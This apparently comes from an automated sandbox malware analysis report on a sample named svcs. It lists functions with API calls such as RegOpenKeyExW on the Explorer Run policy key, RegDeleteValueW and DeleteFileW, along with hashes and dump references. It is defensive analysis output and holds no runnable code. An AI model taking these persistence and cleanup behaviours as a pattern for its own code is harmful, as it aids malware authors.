                                • Opcode Fuzzy Hash: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: ,kG$0kG
                                • API String ID: 1881088180-2015055088
                                • Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                • Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,?,0040ACB3,0000005C,?,?,?,00000000), ref: 0040B876
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,0040ACB3,0000005C,?,?,?,00000000), ref: 0040B8A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteDirectoryFileRemove
                                • String ID: hdF
                                • API String ID: 3325800564-665520524
                                • Opcode ID: df808ba8ebf8d5c0a6d1b72abb8ee9cce7734050c17300acf0bbb65a0f0efe9c
                                • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                • Opcode Fuzzy Hash: df808ba8ebf8d5c0a6d1b72abb8ee9cce7734050c17300acf0bbb65a0f0efe9c
                                • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                Uniqueness

                                Uniqueness Score: -1.00%